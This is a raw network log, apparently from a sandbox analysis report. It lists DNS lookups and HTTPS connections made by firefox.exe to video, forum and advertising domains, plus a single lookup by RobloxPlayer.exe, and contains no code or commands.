geolocation-db.com

DNS Response

159.89.102.253
8.8.8.8:53

253.102.89.159.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

253.102.89.159.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

56.126.166.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

56.126.166.20.in-addr.arpa
8.8.8.8:53

183.142.211.20.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

183.142.211.20.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

id.google.com

dns

firefox.exe

59 B
75 B
1
1

DNS Request

id.google.com

DNS Response

216.58.204.67
8.8.8.8:53

id.google.com

dns

firefox.exe

59 B
75 B
1
1

DNS Request

id.google.com

DNS Response

142.250.200.3
8.8.8.8:53

id.google.com

dns

firefox.exe

59 B
87 B
1
1

DNS Request

id.google.com

DNS Response

2a00:1450:4009:81e::2003
216.58.204.67:443

id.google.com

https

firefox.exe

2.7kB
10.3kB
8
13
8.8.8.8:53

67.204.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

67.204.58.216.in-addr.arpa
8.8.8.8:53

i.ytimg.com

dns

firefox.exe

57 B
249 B
1
1

DNS Request

i.ytimg.com

DNS Response

216.58.212.246

172.217.169.54

142.250.179.246

142.250.180.22

142.250.187.214

142.250.187.246

142.250.178.22

172.217.16.246

142.250.200.22

142.250.200.54

216.58.201.118

216.58.204.86
8.8.8.8:53

i.ytimg.com

dns

firefox.exe

57 B
249 B
1
1

DNS Request

i.ytimg.com

DNS Response

216.58.212.246

172.217.169.54

142.250.179.246

142.250.180.22

142.250.187.214

142.250.187.246

142.250.178.22

172.217.16.246

142.250.200.22

142.250.200.54

216.58.201.118

216.58.204.86
8.8.8.8:53

i.ytimg.com

dns

firefox.exe

57 B
169 B
1
1

DNS Request

i.ytimg.com

DNS Response

2a00:1450:4009:80b::2016

2a00:1450:4009:818::2016

2a00:1450:4009:81d::2016

2a00:1450:4009:81e::2016
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

142.250.179.238
216.58.212.246:443

i.ytimg.com

https

firefox.exe

3.2kB
7.3kB
7
8
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

play.google.com

DNS Response

2a00:1450:4009:81d::200e
142.250.179.238:443

play.google.com

https

firefox.exe

43.3kB
1.2MB
143
915
8.8.8.8:53

246.212.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

246.212.58.216.in-addr.arpa
8.8.8.8:53

238.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.179.250.142.in-addr.arpa
8.8.8.8:53

www.reddit.com

dns

firefox.exe

60 B
159 B
1
1

DNS Request

www.reddit.com

DNS Response

151.101.1.140

151.101.65.140

151.101.129.140

151.101.193.140
8.8.8.8:53

reddit.map.fastly.net

dns

firefox.exe

67 B
131 B
1
1

DNS Request

reddit.map.fastly.net

DNS Response

151.101.1.140

151.101.65.140

151.101.129.140

151.101.193.140
8.8.8.8:53

reddit.map.fastly.net

dns

firefox.exe

67 B
128 B
1
1

DNS Request

reddit.map.fastly.net
8.8.8.8:53

140.1.101.151.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

140.1.101.151.in-addr.arpa
8.8.8.8:53

www.youtube.com

dns

firefox.exe

61 B
271 B
1
1

DNS Request

www.youtube.com

DNS Response

142.250.187.238

142.250.178.14

172.217.16.238

142.250.200.14

142.250.200.46

216.58.201.110

216.58.204.78

216.58.212.206

142.250.179.238

142.250.180.14

142.250.187.206
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
245 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

142.250.187.238

142.250.178.14

172.217.16.238

142.250.200.14

142.250.200.46

216.58.201.110

216.58.204.78

216.58.212.206

142.250.179.238

142.250.180.14

142.250.187.206
8.8.8.8:53

youtube-ui.l.google.com

dns

firefox.exe

69 B
181 B
1
1

DNS Request

youtube-ui.l.google.com

DNS Response

2a00:1450:4009:820::200e

2a00:1450:4009:815::200e

2a00:1450:4009:821::200e

2a00:1450:4009:822::200e
142.250.187.238:443

youtube-ui.l.google.com

https

firefox.exe

3.9kB
9.7kB
14
12
8.8.8.8:53

238.187.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

238.187.250.142.in-addr.arpa
8.8.8.8:53

googleads.g.doubleclick.net

dns

firefox.exe

73 B
89 B
1
1

DNS Request

googleads.g.doubleclick.net

DNS Response

216.58.201.98
8.8.8.8:53

static.doubleclick.net

dns

firefox.exe

68 B
84 B
1
1

DNS Request

static.doubleclick.net

DNS Response

216.58.213.6
8.8.8.8:53

googleads.g.doubleclick.net

dns

firefox.exe

73 B
89 B
1
1

DNS Request

googleads.g.doubleclick.net

DNS Response

142.250.178.2
8.8.8.8:53

static.doubleclick.net

dns

firefox.exe

68 B
84 B
1
1

DNS Request

static.doubleclick.net

DNS Response

216.58.213.6
8.8.8.8:53

static.doubleclick.net

dns

firefox.exe

68 B
96 B
1
1

DNS Request

static.doubleclick.net

DNS Response

2a00:1450:4009:816::2006
8.8.8.8:53

googleads.g.doubleclick.net

dns

firefox.exe

73 B
101 B
1
1

DNS Request

googleads.g.doubleclick.net

DNS Response

2a00:1450:4009:826::2002
8.8.8.8:53

jnn-pa.googleapis.com

dns

firefox.exe

67 B
275 B
1
1

DNS Request

jnn-pa.googleapis.com

DNS Response

172.217.169.42

142.250.179.234

142.250.180.10

142.250.187.202

142.250.187.234

142.250.178.10

172.217.16.234

142.250.200.10

142.250.200.42

216.58.201.106

216.58.204.74

216.58.213.10

172.217.169.10
216.58.201.98:443

googleads.g.doubleclick.net

https

firefox.exe

3.9kB
8.7kB
14
15
216.58.213.6:443

static.doubleclick.net

https

firefox.exe

3.2kB
7.1kB
7
8
8.8.8.8:53

jnn-pa.googleapis.com

dns

firefox.exe

67 B
275 B
1
1

DNS Request

jnn-pa.googleapis.com

DNS Response

172.217.169.42

142.250.179.234

142.250.180.10

142.250.187.202

142.250.187.234

142.250.178.10

172.217.16.234

142.250.200.10

142.250.200.42

216.58.201.106

216.58.204.74

216.58.213.10

172.217.169.10
8.8.8.8:53

jnn-pa.googleapis.com

dns

firefox.exe

67 B
179 B
1
1

DNS Request

jnn-pa.googleapis.com

DNS Response

2a00:1450:4009:80a::200a

2a00:1450:4009:819::200a

2a00:1450:4009:81d::200a

2a00:1450:4009:81e::200a
8.8.8.8:53

98.201.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

98.201.58.216.in-addr.arpa
8.8.8.8:53

42.169.217.172.in-addr.arpa

dns

73 B
112 B
1
1

DNS Request

42.169.217.172.in-addr.arpa
8.8.8.8:53

6.213.58.216.in-addr.arpa

dns

71 B
138 B
1
1

DNS Request

6.213.58.216.in-addr.arpa
172.217.169.42:443

jnn-pa.googleapis.com

https

firefox.exe

3.2kB
7.3kB
7
8
172.217.169.42:443

jnn-pa.googleapis.com

https

firefox.exe

7.3kB
8.7kB
9
9
8.8.8.8:53

www.se7ensins.com

dns

firefox.exe

63 B
95 B
1
1

DNS Request

www.se7ensins.com

DNS Response

104.27.206.87

104.27.205.87
8.8.8.8:53

www.se7ensins.com

dns

firefox.exe

63 B
95 B
1
1

DNS Request

www.se7ensins.com

DNS Response

104.27.205.87

104.27.206.87
8.8.8.8:53

www.se7ensins.com

dns

firefox.exe

63 B
119 B
1
1

DNS Request

www.se7ensins.com

DNS Response

2606:4700:21::681b:ce57

2606:4700:21::681b:cd57
8.8.8.8:53

87.206.27.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

87.206.27.104.in-addr.arpa
104.27.206.87:443

www.se7ensins.com

https

firefox.exe

43.5kB
445.5kB
95
430
8.8.8.8:53

cdnjs.cloudflare.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

cdnjs.cloudflare.com

DNS Response

104.17.25.14

104.17.24.14
8.8.8.8:53

cdnjs.cloudflare.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

cdnjs.cloudflare.com

DNS Response

104.17.25.14

104.17.24.14
8.8.8.8:53

cdnjs.cloudflare.com

dns

firefox.exe

66 B
122 B
1
1

DNS Request

cdnjs.cloudflare.com

DNS Response

2606:4700::6811:190e

2606:4700::6811:180e
8.8.8.8:53

104.201.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

104.201.58.216.in-addr.arpa
8.8.8.8:53

14.25.17.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

14.25.17.104.in-addr.arpa
8.8.8.8:53

ajax.googleapis.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

ajax.googleapis.com

DNS Response

172.217.16.234
8.8.8.8:53

ajax.googleapis.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

ajax.googleapis.com

DNS Response

142.250.200.42
8.8.8.8:53

ajax.googleapis.com

dns

firefox.exe

65 B
93 B
1
1

DNS Request

ajax.googleapis.com

DNS Response

2a00:1450:4009:822::200a
104.17.25.14:443

cdnjs.cloudflare.com

https

firefox.exe

1.9kB
5.1kB
6
9
172.217.16.234:443

ajax.googleapis.com

https

firefox.exe

3.2kB
7.3kB
7
8
8.8.8.8:53

static.cloudflareinsights.com

dns

firefox.exe

75 B
107 B
1
1

DNS Request

static.cloudflareinsights.com

DNS Response

104.16.80.73

104.16.79.73
8.8.8.8:53

static.cloudflareinsights.com

dns

firefox.exe

75 B
107 B
1
1

DNS Request

static.cloudflareinsights.com

DNS Response

104.16.80.73

104.16.79.73
8.8.8.8:53

a.pub.network

dns

firefox.exe

59 B
91 B
1
1

DNS Request

a.pub.network

DNS Response

104.18.20.206

104.18.21.206
8.8.8.8:53

a.pub.network

dns

firefox.exe

59 B
91 B
1
1

DNS Request

a.pub.network

DNS Response

104.18.20.206

104.18.21.206
8.8.8.8:53

static.cloudflareinsights.com

dns

firefox.exe

75 B
131 B
1
1

DNS Request

static.cloudflareinsights.com

DNS Response

2606:4700::6810:5049

2606:4700::6810:4f49
8.8.8.8:53

cmp.quantcast.com

dns

firefox.exe

63 B
127 B
1
1

DNS Request

cmp.quantcast.com

DNS Response

3.162.140.119

3.162.140.96

3.162.140.65

3.162.140.93
8.8.8.8:53

a.pub.network

dns

firefox.exe

59 B
115 B
1
1

DNS Request

a.pub.network

DNS Response

2606:4700::6812:15ce

2606:4700::6812:14ce
8.8.8.8:53

cmp.quantcast.com

dns

firefox.exe

63 B
127 B
1
1

DNS Request

cmp.quantcast.com

DNS Response

3.162.140.119

3.162.140.96

3.162.140.65

3.162.140.93
8.8.8.8:53

cmp.quantcast.com

dns

firefox.exe

63 B
145 B
1
1

DNS Request

cmp.quantcast.com
104.18.20.206:443

a.pub.network

https

firefox.exe

5.8kB
397.3kB
42
338
8.8.8.8:53

234.16.217.172.in-addr.arpa

dns

73 B
142 B
1
1

DNS Request

234.16.217.172.in-addr.arpa
8.8.8.8:53

73.80.16.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

73.80.16.104.in-addr.arpa
8.8.8.8:53

206.20.18.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

206.20.18.104.in-addr.arpa
8.8.8.8:53

secure.quantserve.com

dns

firefox.exe

67 B
177 B
1
1

DNS Request

secure.quantserve.com

DNS Response

91.228.74.244

91.228.74.166

91.228.74.200

91.228.74.159
8.8.8.8:53

global.px.quantserve.com

dns

firefox.exe

70 B
134 B
1
1

DNS Request

global.px.quantserve.com

DNS Response

91.228.74.166

91.228.74.159

91.228.74.244

91.228.74.200
8.8.8.8:53

d.pub.network

dns

firefox.exe

59 B
75 B
1
1

DNS Request

d.pub.network

DNS Response

34.160.152.31
8.8.8.8:53

d.pub.network

dns

firefox.exe

59 B
75 B
1
1

DNS Request

d.pub.network

DNS Response

34.160.152.31
8.8.8.8:53

d.pub.network

dns

firefox.exe

59 B
124 B
1
1

DNS Request

d.pub.network
34.160.152.31:443

d.pub.network

https

firefox.exe

2.4kB
13.0kB
9
16
8.8.8.8:53

raw.githubusercontent.com

dns

RobloxPlayer.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.109.133

185.199.111.133

185.199.108.133

185.199.110.133
8.8.8.8:53

31.152.160.34.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

31.152.160.34.in-addr.arpa
8.8.8.8:53

119.140.162.3.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

119.140.162.3.in-addr.arpa
8.8.8.8:53

244.74.228.91.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

244.74.228.91.in-addr.arpa
8.8.8.8:53

rules.quantcount.com

dns

firefox.exe

66 B
173 B
1
1

DNS Request

rules.quantcount.com

DNS Response

18.66.171.123

18.66.171.87

18.66.171.11

18.66.171.10
8.8.8.8:53

d2fashanjl7d9f.cloudfront.net

dns

firefox.exe

75 B
139 B
1
1

DNS Request

d2fashanjl7d9f.cloudfront.net

DNS Response

18.66.171.123

18.66.171.10

18.66.171.87

18.66.171.11
8.8.8.8:53

cmp.inmobi.com

dns

firefox.exe

60 B
206 B
1
1

DNS Request

cmp.inmobi.com

DNS Response

18.66.171.20

18.66.171.48

18.66.171.103

18.66.171.49
8.8.8.8:53

d2fashanjl7d9f.cloudfront.net

dns

firefox.exe

75 B
299 B
1
1

DNS Request

d2fashanjl7d9f.cloudfront.net

DNS Response

2600:9000:2245:800:6:44e3:f8c0:93a1

2600:9000:2245:2400:6:44e3:f8c0:93a1

2600:9000:2245:3c00:6:44e3:f8c0:93a1

2600:9000:2245:d000:6:44e3:f8c0:93a1

2600:9000:2245:1e00:6:44e3:f8c0:93a1

2600:9000:2245:5800:6:44e3:f8c0:93a1

2600:9000:2245:4400:6:44e3:f8c0:93a1

2600:9000:2245:c200:6:44e3:f8c0:93a1
8.8.8.8:53

d23sp3kzv1t6m5.cloudfront.net

dns

firefox.exe

75 B
139 B
1
1

DNS Request

d23sp3kzv1t6m5.cloudfront.net

DNS Response

18.66.171.103

18.66.171.48

18.66.171.49

18.66.171.20
8.8.8.8:53

d23sp3kzv1t6m5.cloudfront.net

dns

firefox.exe

75 B
299 B
1
1

DNS Request

d23sp3kzv1t6m5.cloudfront.net

DNS Response

2600:9000:2245:ee00:1b:cadc:ef40:93a1

2600:9000:2245:7a00:1b:cadc:ef40:93a1

2600:9000:2245:5800:1b:cadc:ef40:93a1

2600:9000:2245:9000:1b:cadc:ef40:93a1

2600:9000:2245:2600:1b:cadc:ef40:93a1

2600:9000:2245:ce00:1b:cadc:ef40:93a1

2600:9000:2245:ae00:1b:cadc:ef40:93a1

2600:9000:2245:ac00:1b:cadc:ef40:93a1
8.8.8.8:53

133.109.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.109.199.185.in-addr.arpa
8.8.8.8:53

123.171.66.18.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

123.171.66.18.in-addr.arpa
8.8.8.8:53

20.171.66.18.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

20.171.66.18.in-addr.arpa
8.8.8.8:53

14.213.58.216.in-addr.arpa

dns

72 B
141 B
1
1

DNS Request

14.213.58.216.in-addr.arpa
8.8.8.8:53

optimise.net

dns

firefox.exe

58 B
74 B
1
1

DNS Request

optimise.net

DNS Response

34.111.152.239
8.8.8.8:53

optimise.net

dns

firefox.exe

58 B
74 B
1
1

DNS Request

optimise.net

DNS Response

34.111.152.239
8.8.8.8:53

optimise.net

dns

firefox.exe

58 B
151 B
1
1

DNS Request

optimise.net
8.8.8.8:53

api.cmp.inmobi.com

dns

firefox.exe

64 B
224 B
1
1

DNS Request

api.cmp.inmobi.com

DNS Response

3.120.230.251

3.75.28.93

35.156.23.70
8.8.8.8:53

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

dns

firefox.exe

104 B
152 B
1
1

DNS Request

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

DNS Response

3.120.230.251

35.156.23.70

3.75.28.93
8.8.8.8:53

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com

dns

firefox.exe

104 B
188 B
1
1

DNS Request

choice-apis-prod-2120274730.eu-central-1.elb.amazonaws.com
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

239.152.111.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

239.152.111.34.in-addr.arpa
34.111.152.239:443

optimise.net

https

firefox.exe

2.1kB
6.7kB
9
7
8.8.8.8:53

api.floors.dev

dns

firefox.exe

60 B
76 B
1
1

DNS Request

api.floors.dev

DNS Response

34.160.128.112
8.8.8.8:53

api.floors.dev

dns

firefox.exe

60 B
76 B
1
1

DNS Request

api.floors.dev

DNS Response

34.160.128.112
8.8.8.8:53

securepubads.g.doubleclick.net

dns

firefox.exe

76 B
92 B
1
1

DNS Request

securepubads.g.doubleclick.net

DNS Response

142.250.200.34
8.8.8.8:53

api.floors.dev

dns

firefox.exe

60 B
153 B
1
1

DNS Request

api.floors.dev
8.8.8.8:53

securepubads.g.doubleclick.net

dns

firefox.exe

76 B
92 B
1
1

DNS Request

securepubads.g.doubleclick.net

DNS Response

142.250.200.34
8.8.8.8:53

securepubads.g.doubleclick.net

dns

firefox.exe

76 B
104 B
1
1

DNS Request

securepubads.g.doubleclick.net

DNS Response

2a00:1450:4009:823::2002
8.8.8.8:53

251.230.120.3.in-addr.arpa

dns

72 B
138 B
1
1

DNS Request

251.230.120.3.in-addr.arpa
34.160.128.112:443

api.floors.dev

https

firefox.exe

1.9kB
5.9kB
6
7
142.250.200.34:443

securepubads.g.doubleclick.net

https

firefox.exe

15.5kB
211.9kB
60
181
8.8.8.8:53

112.128.160.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

112.128.160.34.in-addr.arpa
8.8.8.8:53

34.200.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

34.200.250.142.in-addr.arpa
8.8.8.8:53

sb.scorecardresearch.com

dns

firefox.exe

70 B
134 B
1
1

DNS Request

sb.scorecardresearch.com

DNS Response

3.162.140.91

3.162.140.41

3.162.140.66

3.162.140.47
8.8.8.8:53

sb.scorecardresearch.com

dns

firefox.exe

70 B
134 B
1
1

DNS Request

sb.scorecardresearch.com

DNS Response

3.162.140.91

3.162.140.41

3.162.140.66

3.162.140.47
8.8.8.8:53

pixel.quantserve.com

dns

firefox.exe

66 B
154 B
1
1

DNS Request

pixel.quantserve.com

DNS Response

91.228.74.159

91.228.74.166

91.228.74.244

91.228.74.200
8.8.8.8:53

sb.scorecardresearch.com

dns

firefox.exe

129 B
287 B
2
2

DNS Request

sb.scorecardresearch.com

DNS Request

api.rlcdn.com
8.8.8.8:53

cdn.confiant-integrations.net

dns

firefox.exe

75 B
107 B
1
1

DNS Request

cdn.confiant-integrations.net

DNS Response

104.18.43.90

172.64.144.166
8.8.8.8:53

freestar-io.videoplayerhub.com

dns

firefox.exe

76 B
124 B
1
1

DNS Request

freestar-io.videoplayerhub.com

DNS Response

104.26.9.50

104.26.8.50

172.67.74.207
8.8.8.8:53

cdn.confiant-integrations.net

dns

firefox.exe

75 B
107 B
1
1

DNS Request

cdn.confiant-integrations.net

DNS Response

104.18.43.90

172.64.144.166
8.8.8.8:53

freestar-io.videoplayerhub.com

dns

firefox.exe

76 B
124 B
1
1

DNS Request

freestar-io.videoplayerhub.com

DNS Response

104.26.9.50

104.26.8.50

172.67.74.207
8.8.8.8:53

c.amazon-adsystem.com

dns

firefox.exe

67 B
126 B
1
1

DNS Request

c.amazon-adsystem.com

DNS Response

3.162.142.187
8.8.8.8:53

cdn.hadronid.net

dns

firefox.exe

62 B
110 B
1
1

DNS Request

cdn.hadronid.net

DNS Response

104.22.53.173

172.67.36.110

104.22.52.173
8.8.8.8:53

cdn.confiant-integrations.net

dns

firefox.exe

75 B
131 B
1
1

DNS Request

cdn.confiant-integrations.net

DNS Response

2606:4700:4400::6812:2b5a

2606:4700:4400::ac40:90a6
8.8.8.8:53

freestar-io.videoplayerhub.com

dns

firefox.exe

76 B
160 B
1
1

DNS Request

freestar-io.videoplayerhub.com

DNS Response

2606:4700:20::ac43:4acf

2606:4700:20::681a:832

2606:4700:20::681a:932
8.8.8.8:53

d1ykf07e75w7ss.cloudfront.net

dns

firefox.exe

75 B
91 B
1
1

DNS Request

d1ykf07e75w7ss.cloudfront.net

DNS Response

3.162.142.187
8.8.8.8:53

cdn.hadronid.net

dns

firefox.exe

62 B
110 B
1
1

DNS Request

cdn.hadronid.net

DNS Response

104.22.52.173

172.67.36.110

104.22.53.173
8.8.8.8:53

cdn.hadronid.net

dns

firefox.exe

62 B
146 B
1
1

DNS Request

cdn.hadronid.net

DNS Response

2606:4700:10::6816:34ad

2606:4700:10::ac43:246e

2606:4700:10::6816:35ad
8.8.8.8:53

d1ykf07e75w7ss.cloudfront.net

dns

firefox.exe

75 B
156 B
1
1

DNS Request

d1ykf07e75w7ss.cloudfront.net
104.18.43.90:443

cdn.confiant-integrations.net

https

firefox.exe

3.1kB
117.7kB
20
104
8.8.8.8:53

btloader.com

dns

firefox.exe

58 B
106 B
1
1

DNS Request

btloader.com

DNS Response

104.22.75.216

104.22.74.216

172.67.41.60
8.8.8.8:53

id.hadron.ad.gt

dns

firefox.exe

61 B
157 B
1
1

DNS Request

id.hadron.ad.gt

DNS Response

104.22.5.69

172.67.23.234

104.22.4.69
8.8.8.8:53

btloader.com

dns

firefox.exe

58 B
106 B
1
1

DNS Request

btloader.com

DNS Response

104.22.75.216

104.22.74.216

172.67.41.60
8.8.8.8:53

id.hadron.ad.gt.cdn.cloudflare.net

dns

firefox.exe

80 B
128 B
1
1

DNS Request

id.hadron.ad.gt.cdn.cloudflare.net

DNS Response

172.67.23.234

104.22.5.69

104.22.4.69
8.8.8.8:53

btloader.com

dns

firefox.exe

58 B
142 B
1
1

DNS Request

btloader.com

DNS Response

2606:4700:10::ac43:293c

2606:4700:10::6816:4ad8

2606:4700:10::6816:4bd8
8.8.8.8:53

id.hadron.ad.gt.cdn.cloudflare.net

dns

firefox.exe

80 B
164 B
1
1

DNS Request

id.hadron.ad.gt.cdn.cloudflare.net

DNS Response

2606:4700:10::6816:445

2606:4700:10::ac43:17ea

2606:4700:10::6816:545
8.8.8.8:53

91.140.162.3.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

91.140.162.3.in-addr.arpa
8.8.8.8:53

159.74.228.91.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

159.74.228.91.in-addr.arpa
8.8.8.8:53

90.43.18.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

90.43.18.104.in-addr.arpa
8.8.8.8:53

50.9.26.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

50.9.26.104.in-addr.arpa
8.8.8.8:53

173.53.22.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

173.53.22.104.in-addr.arpa
8.8.8.8:53

69.5.22.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

69.5.22.104.in-addr.arpa
8.8.8.8:53

216.75.22.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

216.75.22.104.in-addr.arpa
8.8.8.8:53

ups.analytics.yahoo.com

dns

firefox.exe

69 B
254 B
1
1

DNS Request

ups.analytics.yahoo.com

DNS Response

3.75.62.37

3.71.149.231
8.8.8.8:53

gum.criteo.com

dns

firefox.exe

166 B
245 B
2
2

DNS Request

gum.criteo.com

DNS Response

178.250.1.11

DNS Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

DNS Response

3.75.62.37

3.71.149.231
8.8.8.8:53

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

dns

firefox.exe

106 B
138 B
1
1

DNS Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

DNS Response

3.71.149.231

3.75.62.37
8.8.8.8:53

id5-sync.com

dns

firefox.exe

58 B
218 B
1
1

DNS Request

id5-sync.com

DNS Response

162.19.138.83

162.19.138.118

141.95.98.65

162.19.138.116

141.95.98.64

162.19.138.119

141.95.33.120

162.19.138.120

162.19.138.117

162.19.138.82
8.8.8.8:53

api.rlcdn.com

dns

firefox.exe

59 B
75 B
1
1

DNS Request

api.rlcdn.com

DNS Response

34.120.133.55
8.8.8.8:53

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

dns

firefox.exe

106 B
187 B
1
1

DNS Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud
8.8.8.8:53

gum.nl3.vip.prod.criteo.com

dns

firefox.exe

73 B
89 B
1
1

DNS Request

gum.nl3.vip.prod.criteo.com

DNS Response

178.250.1.11
8.8.8.8:53

id5-sync.com

dns

firefox.exe

58 B
218 B
1
1

DNS Request

id5-sync.com

DNS Response

162.19.138.83

162.19.138.118

141.95.98.65

162.19.138.116

141.95.98.64

162.19.138.119

141.95.33.120

162.19.138.120

162.19.138.117

162.19.138.82
8.8.8.8:53

idx.liadm.com

dns

firefox.exe

59 B
220 B
1
1

DNS Request

idx.liadm.com

DNS Response

44.197.96.190

184.73.49.33

34.227.198.57

3.211.31.230

52.203.33.12

3.223.221.123

44.215.81.90

18.210.125.214
8.8.8.8:53

gum.nl3.vip.prod.criteo.com

dns

firefox.exe

73 B
101 B
1
1

DNS Request

gum.nl3.vip.prod.criteo.com

DNS Response

2a02:2638:3::c
8.8.8.8:53

id5-sync.com

dns

firefox.exe

58 B
117 B
1
1

DNS Request

id5-sync.com
8.8.8.8:53

api.rlcdn.com

dns

firefox.exe

59 B
75 B
1
1

DNS Request

api.rlcdn.com

DNS Response

34.120.133.55
8.8.8.8:53

match.adsrvr.org

dns

firefox.exe

62 B
126 B
1
1

DNS Request

match.adsrvr.org

DNS Response

52.223.40.198

35.71.131.137

15.197.193.217

3.33.220.150
8.8.8.8:53

idx.cph.liveintent.com

dns

firefox.exe

68 B
196 B
1
1

DNS Request

idx.cph.liveintent.com

DNS Response

34.227.198.57

3.211.31.230

44.197.96.190

44.215.170.75

3.223.221.123

52.203.33.12

18.210.125.214

184.73.49.33
8.8.8.8:53

match.adsrvr.org

dns

firefox.exe

62 B
126 B
1
1

DNS Request

match.adsrvr.org

DNS Response

52.223.40.198

35.71.131.137

15.197.193.217

3.33.220.150
8.8.8.8:53

idx.cph.liveintent.com

dns

firefox.exe

68 B
152 B
1
1

DNS Request

idx.cph.liveintent.com
8.8.8.8:53

match.adsrvr.org

dns

firefox.exe

62 B
127 B
1
1

DNS Request

match.adsrvr.org
8.8.8.8:53

a.ad.gt

dns

firefox.exe

53 B
141 B
1
1

DNS Request

a.ad.gt

DNS Response

172.67.23.234

104.22.4.69

104.22.5.69
8.8.8.8:53

ad-delivery.net

dns

firefox.exe

61 B
109 B
1
1

DNS Request

ad-delivery.net

DNS Response

104.26.2.70

172.67.69.19

104.26.3.70
8.8.8.8:53

a.ad.gt.cdn.cloudflare.net

dns

firefox.exe

72 B
120 B
1
1

DNS Request

a.ad.gt.cdn.cloudflare.net

DNS Response

172.67.23.234

104.22.4.69

104.22.5.69
8.8.8.8:53

ad-delivery.net

dns

firefox.exe

61 B
109 B
1
1

DNS Request

ad-delivery.net

DNS Response

104.26.2.70

172.67.69.19

104.26.3.70
8.8.8.8:53

a.ad.gt.cdn.cloudflare.net

dns

firefox.exe

72 B
156 B
1
1

DNS Request

a.ad.gt.cdn.cloudflare.net

DNS Response

2606:4700:10::6816:545

2606:4700:10::ac43:17ea

2606:4700:10::6816:445
8.8.8.8:53

api.btloader.com

dns

firefox.exe

62 B
78 B
1
1

DNS Request

api.btloader.com

DNS Response

130.211.23.194
8.8.8.8:53

ad-delivery.net

dns

firefox.exe

61 B
145 B
1
1

DNS Request

ad-delivery.net

DNS Response

2606:4700:20::ac43:4513

2606:4700:20::681a:346

2606:4700:20::681a:246
8.8.8.8:53

api.btloader.com

dns

firefox.exe

62 B
78 B
1
1

DNS Request

api.btloader.com

DNS Response

130.211.23.194
8.8.8.8:53

api.btloader.com

dns

firefox.exe

62 B
121 B
1
1

DNS Request

api.btloader.com
8.8.8.8:53

c.pub.network

dns

firefox.exe

59 B
75 B
1
1

DNS Request

c.pub.network

DNS Response

34.160.152.31
8.8.8.8:53

c.pub.network

dns

firefox.exe

59 B
75 B
1
1

DNS Request

c.pub.network

DNS Response

34.160.152.31
8.8.8.8:53

c.pub.network

dns

firefox.exe

59 B
124 B
1
1

DNS Request

c.pub.network
8.8.8.8:53

187.142.162.3.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

187.142.162.3.in-addr.arpa
8.8.8.8:53

config.aps.amazon-adsystem.com

dns

firefox.exe

76 B
140 B
1
1

DNS Request

config.aps.amazon-adsystem.com

DNS Response

18.66.171.125

18.66.171.56

18.66.171.5

18.66.171.49
8.8.8.8:53

config.aps.amazon-adsystem.com

dns

firefox.exe

76 B
140 B
1
1

DNS Request

config.aps.amazon-adsystem.com

DNS Response

18.66.171.49

18.66.171.125

18.66.171.5
